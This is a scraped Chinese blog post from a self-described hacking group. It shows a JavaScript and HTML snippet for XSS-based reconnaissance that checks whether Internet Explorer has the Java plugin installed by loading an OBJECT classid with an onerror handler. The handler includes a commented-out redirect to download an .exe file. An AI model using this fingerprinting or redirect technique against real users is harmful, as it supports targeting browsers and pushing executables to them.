注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

XSS探测信息 JS通过classid来判断是否存在指定组件 IE  

2014-08-31 12:46:12|  分类: JS代码 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
<script language="JavaScript" type="text/JavaScript">
function showerror()
{
//window.navigate("http://qqhack8.blog.163.com/k8team.exe");
alert("err");
}
</script>

<script language="JavaScript" type="text/JavaScript">
alert("JAVA TEST");
</script>

<OBJECT
    classid = "clsid:8AD9C840-044E-11D1-B3E9-00805F499D93"
    onerror="javascript:showerror();"
    WIDTH = "655" HEIGHT = "355" NAME = "TestApplet" ALIGN = "middle" VSPACE = "0" HSPACE = "0" >
</OBJECT>

IE7里的管理加载项可以获取到

名称       Java(tm) Plug-In SSV Helper
发行者      Oracle America, Inc.
状态       已启用
文件日期     2013年12月17日,10:52
版本       7.0.450.18
加载时间     0.09 s
  评论这张
 
阅读(1498)| 评论(2)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016